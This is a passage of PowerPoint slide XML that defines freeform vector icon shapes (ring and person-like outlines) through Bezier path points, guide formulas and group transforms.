                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="164"/>
                    <a:pt x="300" y="251"/>
                    <a:pt x="227" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="293"/>
                    <a:pt x="187" y="297"/>
                    <a:pt x="167" y="297"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="166" y="59"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="59"/>
                    <a:pt x="141" y="61"/>
                    <a:pt x="129" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="88"/>
                    <a:pt x="62" y="142"/>
                    <a:pt x="83" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="211"/>
                    <a:pt x="111" y="228"/>
                    <a:pt x="134" y="237"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="245"/>
                    <a:pt x="182" y="245"/>
                    <a:pt x="204" y="234"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="214"/>
                    <a:pt x="271" y="159"/>
                    <a:pt x="250" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="79"/>
                    <a:pt x="202" y="59"/>
                    <a:pt x="166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70" name="Freeform 1020">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75DCD884-9074-400B-93BE-B2B1379CAC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37166" y="9586416"/>
              <a:ext cx="131763" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 167 w 333"/>
                <a:gd name="T1" fmla="*/ 313 h 313"/>
                <a:gd name="T2" fmla="*/ 33 w 333"/>
                <a:gd name="T3" fmla="*/ 227 h 313"/>
                <a:gd name="T4" fmla="*/ 106 w 333"/>
                <a:gd name="T5" fmla="*/ 33 h 313"/>
                <a:gd name="T6" fmla="*/ 300 w 333"/>
                <a:gd name="T7" fmla="*/ 107 h 313"/>
                <a:gd name="T8" fmla="*/ 300 w 333"/>
                <a:gd name="T9" fmla="*/ 107 h 313"/>
                <a:gd name="T10" fmla="*/ 227 w 333"/>
                <a:gd name="T11" fmla="*/ 301 h 313"/>
                <a:gd name="T12" fmla="*/ 167 w 333"/>
                <a:gd name="T13" fmla="*/ 313 h 313"/>
                <a:gd name="T14" fmla="*/ 166 w 333"/>
                <a:gd name="T15" fmla="*/ 75 h 313"/>
                <a:gd name="T16" fmla="*/ 129 w 333"/>
                <a:gd name="T17" fmla="*/ 83 h 313"/>
                <a:gd name="T18" fmla="*/ 83 w 333"/>
                <a:gd name="T19" fmla="*/ 205 h 313"/>
                <a:gd name="T20" fmla="*/ 204 w 333"/>
                <a:gd name="T21" fmla="*/ 251 h 313"/>
                <a:gd name="T22" fmla="*/ 250 w 333"/>
                <a:gd name="T23" fmla="*/ 129 h 313"/>
                <a:gd name="T24" fmla="*/ 166 w 333"/>
                <a:gd name="T25" fmla="*/ 75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3" h="313">
                  <a:moveTo>
                    <a:pt x="167" y="313"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="313"/>
                    <a:pt x="57" y="281"/>
                    <a:pt x="33" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="153"/>
                    <a:pt x="33" y="66"/>
                    <a:pt x="106" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="0"/>
                    <a:pt x="267" y="33"/>
                    <a:pt x="300" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="300" y="107"/>
                    <a:pt x="300" y="107"/>
                    <a:pt x="300" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="181"/>
                    <a:pt x="300" y="267"/>
                    <a:pt x="227" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="309"/>
                    <a:pt x="187" y="313"/>
                    <a:pt x="167" y="313"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="166" y="75"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="75"/>
                    <a:pt x="141" y="78"/>
                    <a:pt x="129" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="104"/>
                    <a:pt x="62" y="158"/>
                    <a:pt x="83" y="205"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="251"/>
                    <a:pt x="158" y="272"/>
                    <a:pt x="204" y="251"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="230"/>
                    <a:pt x="271" y="175"/>
                    <a:pt x="250" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="95"/>
                    <a:pt x="201" y="75"/>
                    <a:pt x="16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71" name="Freeform 1021">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C032106-7234-466E-823D-2F1F3052451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241957" y="10108704"/>
              <a:ext cx="125413" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 167 w 318"/>
                <a:gd name="T1" fmla="*/ 297 h 297"/>
                <a:gd name="T2" fmla="*/ 33 w 318"/>
                <a:gd name="T3" fmla="*/ 211 h 297"/>
                <a:gd name="T4" fmla="*/ 107 w 318"/>
                <a:gd name="T5" fmla="*/ 17 h 297"/>
                <a:gd name="T6" fmla="*/ 219 w 318"/>
                <a:gd name="T7" fmla="*/ 14 h 297"/>
                <a:gd name="T8" fmla="*/ 300 w 318"/>
                <a:gd name="T9" fmla="*/ 91 h 297"/>
                <a:gd name="T10" fmla="*/ 300 w 318"/>
                <a:gd name="T11" fmla="*/ 91 h 297"/>
                <a:gd name="T12" fmla="*/ 304 w 318"/>
                <a:gd name="T13" fmla="*/ 203 h 297"/>
                <a:gd name="T14" fmla="*/ 227 w 318"/>
                <a:gd name="T15" fmla="*/ 284 h 297"/>
                <a:gd name="T16" fmla="*/ 167 w 318"/>
                <a:gd name="T17" fmla="*/ 297 h 297"/>
                <a:gd name="T18" fmla="*/ 167 w 318"/>
                <a:gd name="T19" fmla="*/ 59 h 297"/>
                <a:gd name="T20" fmla="*/ 129 w 318"/>
                <a:gd name="T21" fmla="*/ 67 h 297"/>
                <a:gd name="T22" fmla="*/ 83 w 318"/>
                <a:gd name="T23" fmla="*/ 188 h 297"/>
                <a:gd name="T24" fmla="*/ 204 w 318"/>
                <a:gd name="T25" fmla="*/ 234 h 297"/>
                <a:gd name="T26" fmla="*/ 253 w 318"/>
                <a:gd name="T27" fmla="*/ 183 h 297"/>
                <a:gd name="T28" fmla="*/ 251 w 318"/>
                <a:gd name="T29" fmla="*/ 113 h 297"/>
                <a:gd name="T30" fmla="*/ 251 w 318"/>
                <a:gd name="T31" fmla="*/ 113 h 297"/>
                <a:gd name="T32" fmla="*/ 199 w 318"/>
                <a:gd name="T33" fmla="*/ 65 h 297"/>
                <a:gd name="T34" fmla="*/ 167 w 318"/>
                <a:gd name="T35" fmla="*/ 59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8" h="297">
                  <a:moveTo>
                    <a:pt x="167" y="297"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="297"/>
                    <a:pt x="58" y="265"/>
                    <a:pt x="33" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="137"/>
                    <a:pt x="33" y="50"/>
                    <a:pt x="107" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="1"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="219" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="28"/>
                    <a:pt x="284" y="55"/>
                    <a:pt x="300" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="300" y="91"/>
                    <a:pt x="300" y="91"/>
                    <a:pt x="300" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="126"/>
                    <a:pt x="318" y="166"/>
                    <a:pt x="304" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="239"/>
                    <a:pt x="263" y="268"/>
                    <a:pt x="227" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="293"/>
                    <a:pt x="187" y="297"/>
                    <a:pt x="167" y="297"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="167" y="59"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="59"/>
                    <a:pt x="141" y="61"/>
                    <a:pt x="129" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="88"/>
                    <a:pt x="62" y="142"/>
                    <a:pt x="83" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="234"/>
                    <a:pt x="158" y="255"/>
                    <a:pt x="204" y="234"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="224"/>
                    <a:pt x="244" y="206"/>
                    <a:pt x="253" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="261" y="160"/>
                    <a:pt x="261" y="135"/>
                    <a:pt x="251" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="113"/>
                    <a:pt x="251" y="113"/>
                    <a:pt x="251" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241" y="91"/>
                    <a:pt x="222" y="73"/>
                    <a:pt x="199" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="61"/>
                    <a:pt x="178" y="59"/>
                    <a:pt x="167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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="372" name="Freeform 1022">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37B63C81-A8EF-4930-A118-3A0E29B3C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1601" y="9786444"/>
              <a:ext cx="255588" cy="250825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 322 w 643"/>
                <a:gd name="T1" fmla="*/ 634 h 634"/>
                <a:gd name="T2" fmla="*/ 211 w 643"/>
                <a:gd name="T3" fmla="*/ 613 h 634"/>
                <a:gd name="T4" fmla="*/ 37 w 643"/>
                <a:gd name="T5" fmla="*/ 450 h 634"/>
                <a:gd name="T6" fmla="*/ 30 w 643"/>
                <a:gd name="T7" fmla="*/ 211 h 634"/>
                <a:gd name="T8" fmla="*/ 194 w 643"/>
                <a:gd name="T9" fmla="*/ 37 h 634"/>
                <a:gd name="T10" fmla="*/ 433 w 643"/>
                <a:gd name="T11" fmla="*/ 30 h 634"/>
                <a:gd name="T12" fmla="*/ 606 w 643"/>
                <a:gd name="T13" fmla="*/ 194 h 634"/>
                <a:gd name="T14" fmla="*/ 593 w 643"/>
                <a:gd name="T15" fmla="*/ 230 h 634"/>
                <a:gd name="T16" fmla="*/ 557 w 643"/>
                <a:gd name="T17" fmla="*/ 216 h 634"/>
                <a:gd name="T18" fmla="*/ 413 w 643"/>
                <a:gd name="T19" fmla="*/ 81 h 634"/>
                <a:gd name="T20" fmla="*/ 216 w 643"/>
                <a:gd name="T21" fmla="*/ 87 h 634"/>
                <a:gd name="T22" fmla="*/ 81 w 643"/>
                <a:gd name="T23" fmla="*/ 230 h 634"/>
                <a:gd name="T24" fmla="*/ 87 w 643"/>
                <a:gd name="T25" fmla="*/ 427 h 634"/>
                <a:gd name="T26" fmla="*/ 230 w 643"/>
                <a:gd name="T27" fmla="*/ 562 h 634"/>
                <a:gd name="T28" fmla="*/ 427 w 643"/>
                <a:gd name="T29" fmla="*/ 556 h 634"/>
                <a:gd name="T30" fmla="*/ 578 w 643"/>
                <a:gd name="T31" fmla="*/ 302 h 634"/>
                <a:gd name="T32" fmla="*/ 604 w 643"/>
                <a:gd name="T33" fmla="*/ 272 h 634"/>
                <a:gd name="T34" fmla="*/ 633 w 643"/>
                <a:gd name="T35" fmla="*/ 297 h 634"/>
                <a:gd name="T36" fmla="*/ 450 w 643"/>
                <a:gd name="T37" fmla="*/ 606 h 634"/>
                <a:gd name="T38" fmla="*/ 322 w 643"/>
                <a:gd name="T39" fmla="*/ 634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43" h="634">
                  <a:moveTo>
                    <a:pt x="322" y="634"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="634"/>
                    <a:pt x="247" y="627"/>
                    <a:pt x="211" y="613"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="584"/>
                    <a:pt x="71" y="526"/>
                    <a:pt x="37" y="450"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="374"/>
                    <a:pt x="0" y="289"/>
                    <a:pt x="30" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="133"/>
                    <a:pt x="118" y="71"/>
                    <a:pt x="194" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="270" y="3"/>
                    <a:pt x="355" y="0"/>
                    <a:pt x="433" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="510" y="59"/>
                    <a:pt x="572" y="118"/>
                    <a:pt x="606" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="613" y="207"/>
                    <a:pt x="606" y="224"/>
                    <a:pt x="593" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="579" y="236"/>
                    <a:pt x="563" y="230"/>
                    <a:pt x="557" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="528" y="153"/>
                    <a:pt x="477" y="105"/>
                    <a:pt x="413" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="349" y="57"/>
                    <a:pt x="279" y="59"/>
                    <a:pt x="216" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="115"/>
                    <a:pt x="105" y="166"/>
                    <a:pt x="81" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="294"/>
                    <a:pt x="59" y="364"/>
                    <a:pt x="87" y="427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="490"/>
                    <a:pt x="166" y="538"/>
                    <a:pt x="230" y="562"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="295" y="587"/>
                    <a:pt x="365" y="585"/>
                    <a:pt x="427" y="556"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="526" y="512"/>
                    <a:pt x="587" y="410"/>
                    <a:pt x="578" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="577" y="287"/>
                    <a:pt x="589" y="273"/>
                    <a:pt x="604" y="272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="618" y="271"/>
                    <a:pt x="632" y="282"/>
                    <a:pt x="633" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="643" y="428"/>
                    <a:pt x="569" y="552"/>
                    <a:pt x="450" y="606"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="409" y="625"/>
                    <a:pt x="365" y="634"/>
                    <a:pt x="322" y="6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790" tIns="20895" rIns="41790" bIns="20895" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="nb-NO" sz="962"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="373" name="Group 1245">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AA66638-A9B1-4B82-A010-CE5C08F59430}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3754627" y="3922340"/>
            <a:ext cx="420418" cy="632171"/>
            <a:chOff x="2559051" y="11390313"/>
            <a:chExt cx="431801" cy="649288"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="374" name="Freeform 663">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{694560F9-CF42-45E1-8296-DCB41B4BBD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1914" y="11390313"/>
              <a:ext cx="373063" cy="361950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 407 w 895"/>
                <a:gd name="T1" fmla="*/ 871 h 871"/>
                <a:gd name="T2" fmla="*/ 65 w 895"/>
                <a:gd name="T3" fmla="*/ 540 h 871"/>
                <a:gd name="T4" fmla="*/ 67 w 895"/>
                <a:gd name="T5" fmla="*/ 221 h 871"/>
                <a:gd name="T6" fmla="*/ 397 w 895"/>
                <a:gd name="T7" fmla="*/ 0 h 871"/>
                <a:gd name="T8" fmla="*/ 816 w 895"/>
                <a:gd name="T9" fmla="*/ 17 h 871"/>
                <a:gd name="T10" fmla="*/ 835 w 895"/>
                <a:gd name="T11" fmla="*/ 30 h 871"/>
                <a:gd name="T12" fmla="*/ 749 w 895"/>
                <a:gd name="T13" fmla="*/ 550 h 871"/>
                <a:gd name="T14" fmla="*/ 692 w 895"/>
                <a:gd name="T15" fmla="*/ 731 h 871"/>
                <a:gd name="T16" fmla="*/ 407 w 895"/>
                <a:gd name="T17" fmla="*/ 871 h 871"/>
                <a:gd name="T18" fmla="*/ 397 w 895"/>
                <a:gd name="T19" fmla="*/ 46 h 871"/>
                <a:gd name="T20" fmla="*/ 109 w 895"/>
                <a:gd name="T21" fmla="*/ 242 h 871"/>
                <a:gd name="T22" fmla="*/ 110 w 895"/>
                <a:gd name="T23" fmla="*/ 526 h 871"/>
                <a:gd name="T24" fmla="*/ 111 w 895"/>
                <a:gd name="T25" fmla="*/ 534 h 871"/>
                <a:gd name="T26" fmla="*/ 407 w 895"/>
                <a:gd name="T27" fmla="*/ 824 h 871"/>
                <a:gd name="T28" fmla="*/ 623 w 895"/>
                <a:gd name="T29" fmla="*/ 744 h 871"/>
                <a:gd name="T30" fmla="*/ 703 w 895"/>
                <a:gd name="T31" fmla="*/ 547 h 871"/>
                <a:gd name="T32" fmla="*/ 704 w 895"/>
                <a:gd name="T33" fmla="*/ 536 h 871"/>
                <a:gd name="T34" fmla="*/ 798 w 895"/>
                <a:gd name="T35" fmla="*/ 63 h 871"/>
                <a:gd name="T36" fmla="*/ 397 w 895"/>
                <a:gd name="T37" fmla="*/ 46 h 8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5" h="871">
                  <a:moveTo>
                    <a:pt x="407" y="871"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="871"/>
                    <a:pt x="67" y="580"/>
                    <a:pt x="65" y="540"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="512"/>
                    <a:pt x="0" y="354"/>
                    <a:pt x="67" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="78"/>
                    <a:pt x="257" y="0"/>
                    <a:pt x="397" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="527" y="0"/>
                    <a:pt x="813" y="17"/>
                    <a:pt x="816" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="824" y="18"/>
                    <a:pt x="832" y="23"/>
                    <a:pt x="835" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="895" y="155"/>
                    <a:pt x="769" y="496"/>
                    <a:pt x="749" y="550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="749" y="583"/>
                    <a:pt x="737" y="662"/>
                    <a:pt x="692" y="731"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="651" y="795"/>
                    <a:pt x="568" y="871"/>
                    <a:pt x="407" y="871"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="397" y="46"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="273" y="46"/>
                    <a:pt x="174" y="114"/>
                    <a:pt x="109" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="366"/>
                    <a:pt x="109" y="524"/>
                    <a:pt x="110" y="526"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111" y="529"/>
                    <a:pt x="111" y="531"/>
                    <a:pt x="111" y="534"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="546"/>
                    <a:pt x="120" y="824"/>
                    <a:pt x="407" y="824"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="499" y="824"/>
                    <a:pt x="572" y="797"/>
                    <a:pt x="623" y="744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="699" y="665"/>
                    <a:pt x="703" y="555"/>
                    <a:pt x="703" y="547"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="702" y="544"/>
                    <a:pt x="703" y="540"/>
                    <a:pt x="704" y="536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="742" y="437"/>
                    <a:pt x="830" y="167"/>
                    <a:pt x="798" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="738" y="59"/>
                    <a:pt x="509" y="46"/>
                    <a:pt x="397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5" name="Freeform 664">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40A42E1B-C69B-4350-B0EA-225B71B76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6864" y="11780838"/>
              <a:ext cx="153988" cy="258763"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 344 w 369"/>
                <a:gd name="T1" fmla="*/ 624 h 624"/>
                <a:gd name="T2" fmla="*/ 321 w 369"/>
                <a:gd name="T3" fmla="*/ 601 h 624"/>
                <a:gd name="T4" fmla="*/ 321 w 369"/>
                <a:gd name="T5" fmla="*/ 297 h 624"/>
                <a:gd name="T6" fmla="*/ 263 w 369"/>
                <a:gd name="T7" fmla="*/ 158 h 624"/>
                <a:gd name="T8" fmla="*/ 18 w 369"/>
                <a:gd name="T9" fmla="*/ 48 h 624"/>
                <a:gd name="T10" fmla="*/ 5 w 369"/>
                <a:gd name="T11" fmla="*/ 17 h 624"/>
                <a:gd name="T12" fmla="*/ 36 w 369"/>
                <a:gd name="T13" fmla="*/ 5 h 624"/>
                <a:gd name="T14" fmla="*/ 285 w 369"/>
                <a:gd name="T15" fmla="*/ 117 h 624"/>
                <a:gd name="T16" fmla="*/ 367 w 369"/>
                <a:gd name="T17" fmla="*/ 298 h 624"/>
                <a:gd name="T18" fmla="*/ 367 w 369"/>
                <a:gd name="T19" fmla="*/ 601 h 624"/>
                <a:gd name="T20" fmla="*/ 344 w 369"/>
                <a:gd name="T21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9" h="624">
                  <a:moveTo>
                    <a:pt x="344" y="624"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="624"/>
                    <a:pt x="321" y="614"/>
                    <a:pt x="321" y="601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="297"/>
                    <a:pt x="321" y="297"/>
                    <a:pt x="321" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="296"/>
                    <a:pt x="322" y="191"/>
                    <a:pt x="263" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="119"/>
                    <a:pt x="20" y="48"/>
                    <a:pt x="18" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="43"/>
                    <a:pt x="0" y="29"/>
                    <a:pt x="5" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="5"/>
                    <a:pt x="24" y="0"/>
                    <a:pt x="36" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="8"/>
                    <a:pt x="212" y="77"/>
                    <a:pt x="285" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="164"/>
                    <a:pt x="367" y="293"/>
                    <a:pt x="367" y="298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="601"/>
                    <a:pt x="367" y="601"/>
                    <a:pt x="367" y="601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="614"/>
                    <a:pt x="357" y="624"/>
                    <a:pt x="344" y="6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6" name="Freeform 665">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DD898E2-AC9D-4737-9B46-CF682E49A1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639" y="11712576"/>
              <a:ext cx="169863" cy="146050"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 202 w 410"/>
                <a:gd name="T1" fmla="*/ 350 h 350"/>
                <a:gd name="T2" fmla="*/ 5 w 410"/>
                <a:gd name="T3" fmla="*/ 199 h 350"/>
                <a:gd name="T4" fmla="*/ 17 w 410"/>
                <a:gd name="T5" fmla="*/ 169 h 350"/>
                <a:gd name="T6" fmla="*/ 48 w 410"/>
                <a:gd name="T7" fmla="*/ 181 h 350"/>
                <a:gd name="T8" fmla="*/ 202 w 410"/>
                <a:gd name="T9" fmla="*/ 303 h 350"/>
                <a:gd name="T10" fmla="*/ 364 w 410"/>
                <a:gd name="T11" fmla="*/ 185 h 350"/>
                <a:gd name="T12" fmla="*/ 364 w 410"/>
                <a:gd name="T13" fmla="*/ 24 h 350"/>
                <a:gd name="T14" fmla="*/ 387 w 410"/>
                <a:gd name="T15" fmla="*/ 0 h 350"/>
                <a:gd name="T16" fmla="*/ 410 w 410"/>
                <a:gd name="T17" fmla="*/ 24 h 350"/>
                <a:gd name="T18" fmla="*/ 410 w 410"/>
                <a:gd name="T19" fmla="*/ 190 h 350"/>
                <a:gd name="T20" fmla="*/ 408 w 410"/>
                <a:gd name="T21" fmla="*/ 200 h 350"/>
                <a:gd name="T22" fmla="*/ 202 w 410"/>
                <a:gd name="T23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0" h="350">
                  <a:moveTo>
                    <a:pt x="202" y="350"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="350"/>
                    <a:pt x="7" y="205"/>
                    <a:pt x="5" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="187"/>
                    <a:pt x="5" y="174"/>
                    <a:pt x="17" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="164"/>
                    <a:pt x="43" y="169"/>
                    <a:pt x="48" y="181"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="182"/>
                    <a:pt x="100" y="303"/>
                    <a:pt x="202" y="303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="299" y="303"/>
                    <a:pt x="353" y="206"/>
                    <a:pt x="364" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="24"/>
                    <a:pt x="364" y="24"/>
                    <a:pt x="364" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="11"/>
                    <a:pt x="374" y="0"/>
                    <a:pt x="387" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="400" y="0"/>
                    <a:pt x="410" y="11"/>
                    <a:pt x="410" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="190"/>
                    <a:pt x="410" y="190"/>
                    <a:pt x="410" y="190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="193"/>
                    <a:pt x="409" y="197"/>
                    <a:pt x="408" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="206"/>
                    <a:pt x="340" y="350"/>
                    <a:pt x="202" y="3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7" name="Freeform 666">
